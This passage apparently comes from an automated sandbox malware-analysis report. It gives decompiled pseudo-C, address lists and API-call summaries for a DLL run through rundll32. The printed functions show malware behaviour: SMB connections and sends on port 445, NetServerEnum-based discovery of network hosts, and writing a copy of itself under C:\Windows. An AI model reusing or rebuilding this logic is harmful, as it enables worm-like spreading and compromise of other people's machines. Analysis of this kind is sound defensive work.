				signed int _t17;
				void* _t21;
				signed int _t22;

				_t22 = 0;
				_v8 = 0;
				if(_a4 != 0) {
					_t8 = CreateFileA(_a4, 0x80100000, 3, 0, 3, 0, 0); // executed
					_t21 = _t8;
					if(_t21 != 0xffffffff) {
						_t11 = DeviceIoControl(_t21, 0x70048, 0, 0,  &_v156, 0x90,  &_v8, 0); // executed
						if(_t11 != 0) {
							 *_a8 = _v156;
						} else {
							_t15 = GetLastError();
							if(_t15 > 0) {
								_t15 = _t15 & 0x0000ffff | 0x80070000;
							}
							_t22 = _t15;
						}
						CloseHandle(_t21);
					} else {
						_t17 = GetLastError();
						if(_t17 > 0) {
							_t17 = _t17 & 0x0000ffff | 0x80070000;
						}
						_t22 = _t17;
					}
					return _t22;
				}
				return 0x80070057;
			}











    0x011e1237
    0x011e123a
    0x011e1240
    0x011e125b
    0x011e1261
    0x011e1266
    0x011e1299
    0x011e12a1
    0x011e12c4
    0x011e12a3
    0x011e12a3
    0x011e12ab
    0x011e12b2
    0x011e12b2
    0x011e12b7
    0x011e12b7
    0x011e12c7
    0x011e1268
    0x011e1268
    0x011e1270
    0x011e1277
    0x011e1277
    0x011e127c
    0x011e127c
    0x00000000
    0x011e12cd
    0x00000000

    APIs
    • CreateFileA.KERNEL32(?,80100000,00000003,00000000,00000003,00000000,00000000), ref: 011E125B
    • GetLastError.KERNEL32 ref: 011E1268
    • DeviceIoControl.KERNEL32(00000000,00070048,00000000,00000000,?,00000090,00000000,00000000), ref: 011E1299
    • GetLastError.KERNEL32 ref: 011E12A3
    • CloseHandle.KERNEL32(00000000), ref: 011E12C7
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E6727, Relevance: 7.6, APIs: 5, Instructions: 56
    APIs
    • socket.WS2_32(00000002,00000001,00000006), ref: 011E6737
    • ioctlsocket.WS2_32(00000000,8004667E,000001BD), ref: 011E674C
    • htons.WS2_32(00058778), ref: 011E6784
    • inet_addr.WS2_32(002F1C10), ref: 011E6791
    • connect.WS2_32(00000000,?,00000010), ref: 011E67A1
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E96C7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67
    C-Code - Quality: 75%
    			E011E96C7(short* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v268;
				char _v788;
				WCHAR* _t20;
				char* _t23;
				intOrPtr* _t24;
				void* _t29;
				void* _t31;
				signed int _t32;
				intOrPtr _t33;
				void* _t35;
				void* _t36;
				intOrPtr _t37;
				intOrPtr _t38;

				_v8 = _v8 & 0x00000000;
				_t38 =  *0x11ff11c; // 0x58778
				_t37 =  *0x11ff0fc; // 0x2f1c10
				if(( *0x11ff104 & 0x00000004) == 0) {
					L10:
					return _v8;
				}
				_t20 = PathFindFileNameW("C:\Users\luketaylor\Desktop\abc.dll");
				if(_t20 == 0) {
					goto L10;
				}
				_t35 =  &_v788 - _t20;
				do {
					_t32 =  *_t20 & 0x0000ffff;
					 *(_t35 + _t20) = _t32;
					_t20 =  &(_t20[1]);
				} while (_t32 != 0);
				WideCharToMultiByte(0xfde9, 0, _a4, 0xffffffff,  &_v268, 0x104, 0, 0);
				_t23 =  &_v268;
				__imp__#11(_t23);
				if(_t23 != 0xffffffff) {
					L6:
					_t24 =  &_v788;
					_t36 = _t24 + 2;
					do {
						_t33 =  *_t24;
						_t24 = _t24 + 2;
						_t45 = _t33;
					} while (_t33 != 0);
					_t29 = E011E668A(_t33, _t45,  &_v268, _t37, _t38, _a8, _a12,  &_v788, _t24 - _t36 >> 1); // executed
					if(_t29 == 0) {
						_v8 = 1;
					}
					goto L10;
				}
				_t31 = E011E9683( &_v268,  &_v268); // executed
				if(_t31 == 0) {
					goto L10;
				}
				goto L6;
			}

















    0x011e96d0
    0x011e96dc
    0x011e96e3
    0x011e96e9
    0x011e979c
    0x011e97a2
    0x011e97a2
    0x011e96f4
    0x011e96fc
    0x00000000
    0x00000000
    0x011e9708
    0x011e970a
    0x011e970a
    0x011e970d
    0x011e9711
    0x011e9714
    0x011e9735
    0x011e973b
    0x011e9742
    0x011e974b
    0x011e975d
    0x011e975d
    0x011e9763
    0x011e9766
    0x011e9766
    0x011e9769
    0x011e976c
    0x011e976c
    0x011e978c
    0x011e9793
    0x011e9795
    0x011e9795
    0x00000000
    0x011e9793
    0x011e9754
    0x011e975b
    0x00000000
    0x00000000
    0x00000000

    APIs
    • PathFindFileNameW.SHLWAPI(C:\Users\luketaylor\Desktop\abc.dll), ref: 011E96F4
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 011E9735
    • inet_addr.WS2_32(?), ref: 011E9742
      • Part of subcall function 011E668A: memset.MSVCRT ref: 011E669A
      • Part of subcall function 011E668A: GetTickCount.KERNEL32(?,002F1C10,00058778), ref: 011E66A2
      • Part of subcall function 011E9683: gethostbyname.WS2_32(011E9759), ref: 011E968C
      • Part of subcall function 011E9683: wsprintfA.USER32 ref: 011E96B6
    Strings
    • C:\Users\luketaylor\Desktop\abc.dll, xrefs: 011E96EF
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E9683, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27
    C-Code - Quality: 37%
    			E011E9683(void* __eax, CHAR* _a4) {
				void* _t16;

				_t16 = 0; // executed
				__imp__#52(_a4); // executed
				if(__eax != 0) {
					wsprintfA(_a4, "%u.%u.%u.%u",  *( *( *(__eax + 0xc))) & 0x000000ff, ( *( *(__eax + 0xc)))[1] & 0x000000ff,  *(_t10 + 2) & 0x000000ff,  *(_t10 + 3) & 0x000000ff);
					_t16 = 1;
				}
				return _t16;
			}




    0x011e968a
    0x011e968c
    0x011e9694
    0x011e96b6
    0x011e96bf
    0x011e96bf
    0x011e96c4

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E688F, Relevance: 4.5, APIs: 3, Instructions: 48
    APIs
    • memset.MSVCRT ref: 011E68AE
    • select.WS2_32(00000000,00000000,?,00000000,000001BD), ref: 011E68E4
    • send.WS2_32(?,000001BD,002F1C10,00000000), ref: 011E68FC
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E8946, Relevance: 4.5, APIs: 3, Instructions: 39
    C-Code - Quality: 100%
    			E011E8946(long __ebx, WCHAR* _a4, void* _a8, long _a12) {
				void* _t11;
				int _t14;
				void* _t17;
				struct _OVERLAPPED* _t18;

				_t18 = 0;
				_t11 = CreateFileW(_a4, 0x40000000, 0, 0, (0 | _a12 != 0x00000000) + 1, 0, 0); // executed
				_t17 = _t11;
				if(_t17 != 0xffffffff) {
					_t14 = WriteFile(_t17, _a8, __ebx,  &_a12, 0); // executed
					if(_t14 != 0 && _a12 == __ebx) {
						_t18 = 1;
					}
					CloseHandle(_t17);
				}
				return _t18;
			}







    0x011e894a
    0x011e8963
    0x011e8969
    0x011e896e
    0x011e897a
    0x011e8982
    0x011e8989
    0x011e8989
    0x011e898b
    0x011e898b
    0x011e8996

    APIs
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000), ref: 011E8963
    • WriteFile.KERNEL32(00000000,01442A10,?,011E8A84,00000000), ref: 011E897A
    • CloseHandle.KERNEL32(00000000), ref: 011E898B
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E73AE, Relevance: 4.5, APIs: 3, Instructions: 36
    C-Code - Quality: 100%
    			E011E73AE(long __ebx, long _a4, void* _a8) {
				void* _t6;
				int _t9;
				void* _t12;
				struct _OVERLAPPED* _t13;

				_t13 = 0;
				_t6 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 2, 0); // executed
				_t12 = _t6;
				if(_t12 != 0xffffffff) {
					_a4 = 0;
					_t9 = WriteFile(_t12, _a8, __ebx,  &_a4, 0); // executed
					if(_t9 != 0 && __ebx == _a4) {
						_t13 = 1;
					}
					CloseHandle(_t12);
				}
				return _t13;
			}







    0x011e73b3
    0x011e73c4
    0x011e73ca
    0x011e73cf
    0x011e73da
    0x011e73de
    0x011e73e6
    0x011e73ed
    0x011e73ed
    0x011e73ef
    0x011e73ef
    0x011e73fa

    APIs
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 011E73C4
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 011E73DE
    • CloseHandle.KERNEL32(00000000), ref: 011E73EF
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E835E, Relevance: 4.5, APIs: 3, Instructions: 34
    C-Code - Quality: 61%
    			E011E835E(void* __eflags) {
				short _v1564;
				int _t10;
				void* _t12;
				signed int _t15;

				_t15 = 0;
				if(E011E8320( &_v1564) != 0) {
					_t10 = PathFileExistsW( &_v1564); // executed
					_push(0);
					if(_t10 != 0) {
						ExitProcess();
					}
					_t12 = CreateFileW( &_v1564, 0x40000000, 0, 0, 2, 0x4000000, ??); // executed
					_t15 = 0 | _t12 != 0xffffffff;
				}
				return _t15;
			}







    0x011e836f
    0x011e8378
    0x011e8381
    0x011e8387
    0x011e838a
    0x011e83b6
    0x011e83b6
    0x011e83a1
    0x011e83af
    0x011e83af
    0x011e83b5

    APIs
      • Part of subcall function 011E8320: PathFindFileNameW.SHLWAPI(C:\Users\luketaylor\Desktop\abc.dll), ref: 011E832B
      • Part of subcall function 011E8320: PathCombineW.SHLWAPI(011E7DC9,C:\Windows\,00000000), ref: 011E833A
      • Part of subcall function 011E8320: PathFindExtensionW.SHLWAPI(011E7DC9), ref: 011E8347
    • PathFileExistsW.SHLWAPI(?), ref: 011E8381
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,04000000,00000000), ref: 011E83A1
    • ExitProcess.KERNEL32(00000000), ref: 011E83B6
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E7167, Relevance: 3.8, APIs: 3, Instructions: 48
    C-Code - Quality: 100%
    			E011E7167(signed int* __ebx, struct _CRITICAL_SECTION* __esi, intOrPtr* _a4) {
				void* _t13;
				intOrPtr _t15;
				signed int* _t16;
				signed int _t17;
				signed int _t20;
				intOrPtr* _t21;
				void* _t23;
				struct _CRITICAL_SECTION* _t26;

				_t26 = __esi;
				_t16 = __ebx;
				if(__ebx == 0 || __esi == 0) {
					return 0;
				} else {
					while(1) {
						_t23 = 0;
						EnterCriticalSection(_t26);
						do {
							_t17 =  *_t16;
							_t1 = _t26 + 0x24; // 0x0
							if(_t17 >=  *_t1) {
								break;
							}
							_t2 = _t26 + 0x18; // 0x34c698
							_t15 =  *((intOrPtr*)( *_t2 + _t17 * 4));
							_t20 =  *(_t15 + 4);
							if(_t20 == 0 || (_t16[1] & _t20) != 0) {
								_t21 = _a4;
								_t23 = 1;
								if(_t21 != 0) {
									 *_t21 = _t15;
								}
							} else {
								_t23 = 0;
							}
							 *_t16 = _t17 + 1;
						} while (_t23 == 0);
						LeaveCriticalSection(_t26);
						_t13 = _t23;
						if(_t23 != 0) {
							L14:
							return _t13;
						}
						_t10 = _t26 + 0x28; // 0x1
						if( *_t10 != 0) {
							goto L14;
						}
						Sleep(0x2710); // executed
					}
				}
			}











    0x011e7167
    0x011e7167
    0x011e716e
    0x011e71d3
    0x011e7174
    0x011e7175
    0x011e7176
    0x011e7178
    0x011e717e
    0x011e717e
    0x011e7180
    0x011e7185
    0x00000000
    0x00000000
    0x011e7187
    0x011e718a
    0x011e718d
    0x011e7192
    0x011e719d
    0x011e71a2
    0x011e71a5
    0x011e71a7
    0x011e71a7
    0x011e7199
    0x011e7199
    0x011e7199
    0x011e71aa
    0x011e71ac
    0x011e71b1
    0x011e71b7
    0x011e71bb
    0x011e71d1
    0x00000000
    0x011e71d1
    0x011e71bd
    0x011e71c2
    0x00000000
    0x00000000
    0x011e71c9
    0x011e71c9
    0x011e7175

    APIs
    • EnterCriticalSection.KERNEL32(002E6710,76E6FE8D,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7178
    • LeaveCriticalSection.KERNEL32(002E6710,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E71B1
    • Sleep.KERNELBASE(00002710,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E71C9
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011EA274, Relevance: 3.8, APIs: 3, Instructions: 46
    C-Code - Quality: 100%
    			E011EA274(void* __eflags, void* _a4) {
				short _v36;
				void* _t13;
				void* _t21;
				char* _t22;
				void* _t23;

				_t23 = __eflags;
				_t21 = _a4;
				Sleep( *_t21);
				_t22 =  *0x11ff140; // 0x2e8160
				_t20 = _t22;
				_t19 = E011E6F40(_t22, _t23,  &_v36);
				if(_t8 != 0) {
					do {
						_t13 = E011E9DC3( &_v36); // executed
						if(_t13 != 0) {
							_t20 =  &_v36;
							E011E6F91( &_v36, _t22, _t19);
						}
						_v36 = 0;
					} while (E011E6F02(_t20,  &_v36) != 0);
					E011E6F78(_t19);
				}
				HeapFree(GetProcessHeap(), 0, _t21);
				return 0;
			}








    0x011ea274
    0x011ea27d
    0x011ea282
    0x011ea288
    0x011ea292
    0x011ea299
    0x011ea29d
    0x011ea29f
    0x011ea2a3
    0x011ea2aa
    0x011ea2ae
    0x011ea2b1
    0x011ea2b1
    0x011ea2b8
    0x011ea2c5
    0x011ea2ca
    0x011ea2ca
    0x011ea2d9
    0x011ea2e5

    APIs
    • Sleep.KERNELBASE(?), ref: 011EA282
      • Part of subcall function 011E6F78: GetProcessHeap.KERNEL32(00000000,011E9F85,?,011E9F85,?), ref: 011E6F80
      • Part of subcall function 011E6F78: HeapFree.KERNEL32(00000000,?,011E9F85), ref: 011E6F87
    • GetProcessHeap.KERNEL32(00000000,?,?), ref: 011EA2D2
    • HeapFree.KERNEL32(00000000), ref: 011EA2D9
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E8282, Relevance: 3.1, APIs: 2, Instructions: 75
    C-Code - Quality: 51%
    			E011E8282(void* __ecx, signed int* _a4, signed int* _a8, signed int* _a12, signed int* _a16) {
				void* _v8;
				signed int _t17;
				void** _t19;
				void* _t20;
				signed int _t22;
				signed int* _t23;
				signed int* _t24;
				void* _t26;
				void* _t27;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int* _t37;
				signed int* _t38;
				void* _t39;
				signed int _t40;
				signed int _t42;
				signed int _t43;

				_t17 = E011E6973();
				_t40 = _t17;
				_t19 =  &_v8;
				asm("sbb esi, esi");
				_t27 = 0;
				_t2 = _t40 - 0x55; // -85
				_t43 = _t42 & _t2;
				_v8 = 0;
				__imp__NetServerGetInfo(0, 0x65, _t19, 0x55, _t39, _t42, _t26, __ecx); // executed
				_t20 = _v8;
				if(_t19 == 0 && ( *(_t20 + 0x10) & 0x00000018) != 0) {
					_t27 = 1;
				}
				if(_t20 != 0) {
					NetApiBufferFree(_t20);
				}
				if(_t27 != 0) {
					_t40 = _t40 + 0xf;
				}
				_t31 = 3;
				_t22 = _t40 / _t31;
				if(_t40 <= 0x55) {
					_t32 = 0xf;
					_t12 = _t40 - 0xf; // -15
					asm("sbb ecx, ecx");
					_t33 = _t32 & _t12;
				} else {
					_t33 = 0x46;
				}
				if(_t40 > 0xf) {
					_t40 = 0xf;
				}
				_t37 = _a4;
				if(_t37 != 0) {
					 *_t37 = _t43;
				}
				_t38 = _a12;
				if(_t38 != 0) {
					 *_t38 = _t22;
				}
				_t23 = _a16;
				if(_t23 != 0) {
					 *_t23 = _t33;
				}
				_t24 = _a8;
				if(_t24 != 0) {
					 *_t24 = _t40;
				}
				return _t24;
			}





















    0x011e8289
    0x011e8290
    0x011e8295
    0x011e8299
    0x011e829b
    0x011e829f
    0x011e82a3
    0x011e82a5
    0x011e82a8
    0x011e82b0
    0x011e82b3
    0x011e82bb
    0x011e82bb
    0x011e82be
    0x011e82c1
    0x011e82c1
    0x011e82c9
    0x011e82cb
    0x011e82cb
    0x011e82d4
    0x011e82d5
    0x011e82da
    0x011e82e3
    0x011e82e6
    0x011e82e9
    0x011e82eb
    0x011e82dc
    0x011e82de
    0x011e82de
    0x011e82f0
    0x011e82f4
    0x011e82f4
    0x011e82f5
    0x011e82fa
    0x011e82fc
    0x011e82fc
    0x011e82fe
    0x011e8303
    0x011e8305
    0x011e8305
    0x011e8307
    0x011e830c
    0x011e830e
    0x011e830e
    0x011e8310
    0x011e8315
    0x011e8317
    0x011e8317
    0x011e831d

    APIs
      • Part of subcall function 011E6973: GetTickCount.KERNEL32(011E84FC), ref: 011E6973
    • NetServerGetInfo.NETAPI32(00000000,00000065,?,00000000,00000000,76E6DE72,?,?,011E8029,000000FF,?,?,?), ref: 011E82A8
    • NetApiBufferFree.NETAPI32(?,?,?,011E8029,000000FF,?,?,?), ref: 011E82C1
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E795A, Relevance: 3.1, APIs: 2, Instructions: 73
    C-Code - Quality: 68%
    			E011E795A(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __esi;
				void** _t30;
				void* _t40;
				void* _t42;
				intOrPtr* _t43;
				void* _t44;

				_t44 = 0;
				_t30 =  &_v8;
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				__imp__NetServerEnum(0, 0x65, _t30, 0xffffffff,  &_v12,  &_v20, _a8, _a12,  &_v16); // executed
				if(_t30 == 0 || _t30 == 0xea) {
					_t42 = _v8;
					_a12 = 1;
					if(_t42 == _t44) {
						goto L16;
					}
					_t40 = 0;
					if(_v12 <= _t44) {
						L13:
						goto L14;
					}
					_t43 = _t42 + 4;
					while(_t43 != 4) {
						if(( *(_t43 + 0xc) & 0x80000000) == 0) {
							if( *((intOrPtr*)(_t43 - 4)) == 0x1f4 && ( *(_t43 + 4) & 0x0000000f) > 4) {
								_t44 = 0;
								E011E6FC7( *_t43, 0, _a4);
							}
						} else {
							E011E795A(_a4, 3,  *_t43); // executed
						}
						_t43 = _t43 + 0x18;
						_t40 = _t40 + 1;
						if(_t40 < _v12) {
							continue;
						} else {
							goto L13;
						}
					}
					goto L13;
				} else {
					_a12 = 0;
					L14:
					if(_v8 != _t44) {
						NetApiBufferFree(_v8);
					}
					L16:
					return _a12;
				}
			}













    0x011e796f
    0x011e7978
    0x011e797f
    0x011e7982
    0x011e7985
    0x011e7988
    0x011e798b
    0x011e7993
    0x011e79a1
    0x011e79a4
    0x011e79ad
    0x00000000
    0x00000000
    0x011e79b0
    0x011e79b5
    0x011e79ff
    0x00000000
    0x011e79ff
    0x011e79b7
    0x011e79ba
    0x011e79c8
    0x011e79df
    0x011e79ef
    0x011e79f1
    0x011e79f1
    0x011e79ca
    0x011e79d1
    0x011e79d1
    0x011e79f6
    0x011e79f9
    0x011e79fd
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011e79fd
    0x00000000
    0x011e799c
    0x011e799c
    0x011e7a00
    0x011e7a03
    0x011e7a08
    0x011e7a08
    0x011e7a0e
    0x011e7a14
    0x011e7a14

    APIs
    • NetServerEnum.NETAPI32(00000000,00000065,?,000000FF,?,002E8160,?,002E8160,?,002E8160,00000000,002E8160), ref: 011E798B
    • NetApiBufferFree.NETAPI32(?), ref: 011E7A08
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E668A, Relevance: 3.1, APIs: 2, Instructions: 54
    C-Code - Quality: 100%
    			E011E668A(signed int* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void _v88;
				void* _t23;
				void* _t25;
				signed int* _t31;
				void* _t32;
				void* _t37;

				_t37 = __eflags;
				_t31 = __ecx;
				memset( &_v88, 0, 0x54);
				 *0x11ffb48 = GetTickCount();
				 *0x11ff8fd = 0;
				_t23 = E011E5A7E(_t31, _t37,  &_v88, _a4, 0x1bd, 0, _a8, _a12, _a16, _a20, _a24, _a28); // executed
				_t32 = _t23;
				if(_t32 == 0) {
					 *0x11ff8fd = 0;
					_t25 = E011E5A7E(_t31, __eflags,  &_v88, _a4, 0x1bd, E011E1F74, _a8, _a12, _a16, _a20, _a24, _a28); // executed
					E011E2068( &_v88);
					return _t25;
				}
				E011E2068( &_v88);
				return _t32;
			}









    0x011e668a
    0x011e668a
    0x011e669a
    0x011e66b3
    0x011e66c2
    0x011e66d6
    0x011e66db
    0x011e66e2
    0x011e66f0
    0x011e6710
    0x011e671a
    0x00000000
    0x011e671f
    0x011e66e4
    0x00000000

    APIs
    • memset.MSVCRT ref: 011E669A
    • GetTickCount.KERNEL32(?,002F1C10,00058778), ref: 011E66A2
      • Part of subcall function 011E5A7E: memcpy.MSVCRT ref: 011E64F8
      • Part of subcall function 011E5A7E: memcpy.MSVCRT ref: 011E651F
      • Part of subcall function 011E5A7E: Sleep.KERNELBASE(00000456), ref: 011E65AA
      • Part of subcall function 011E5A7E: rand.MSVCRT ref: 011E5C7A
      • Part of subcall function 011E5A7E: Sleep.KERNELBASE(00000456,?,?,?,?,?,?,?,00000001,?,?,?,00001000,?,?,?), ref: 011E5E2D
      • Part of subcall function 011E5A7E: Sleep.KERNELBASE(00000456,?,?,002F1C10,00058778,?,?,002F1C10,00058778,?,?,002F1C10,00058778,?,?,002F1C10), ref: 011E60E3
      • Part of subcall function 011E5A7E: closesocket.WS2_32(?), ref: 011E6146
      • Part of subcall function 011E5A7E: closesocket.WS2_32(?), ref: 011E6229
      • Part of subcall function 011E5A7E: Sleep.KERNELBASE(00000456,00000000,?,00000014,?,?,?,?,?,?,?,?,?,?,?,?), ref: 011E62F6
      • Part of subcall function 011E2068: closesocket.WS2_32(?), ref: 011E2076
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E8243, Relevance: 3.0, APIs: 2, Instructions: 29
    C-Code - Quality: 37%
    			E011E8243(void* __ecx) {
				signed int _v8;
				void** _t9;
				signed char _t12;
				void* _t14;
				void* _t15;
				void* _t16;

				_t9 =  &_v8;
				_t16 = 0;
				_v8 = _v8 & 0;
				__imp__NetServerGetInfo(0, 0x65, _t9, _t15, __ecx); // executed
				_t14 = _v8;
				if(_t9 == 0) {
					_t12 =  *(_t14 + 0x10);
					if((_t12 & 0x00008000) != 0 || (_t12 & 0x00000018) != 0) {
						_t16 = 1;
					}
				}
				if(_t14 != 0) {
					NetApiBufferFree(_t14);
				}
				return _t16;
			}









    0x011e8248
    0x011e824c
    0x011e824e
    0x011e8254
    0x011e825a
    0x011e825f
    0x011e8261
    0x011e8269
    0x011e8271
    0x011e8271
    0x011e8269
    0x011e8274
    0x011e8277
    0x011e8277
    0x011e8281

    APIs
    • NetServerGetInfo.NETAPI32(00000000,00000065,?,73389263,?,?,011E8FCD), ref: 011E8254
    • NetApiBufferFree.NETAPI32(?,?,?,011E8FCD), ref: 011E8277
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E1000, Relevance: 3.0, APIs: 2, Instructions: 9
    C-Code - Quality: 100%
    			E011E1000(long _a4) {
				void* _t3;

				_t3 = HeapAlloc(GetProcessHeap(), 8, _a4); // executed
				return _t3;
			}




    0x011e100f
    0x011e1016

    APIs
    • GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
    • RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
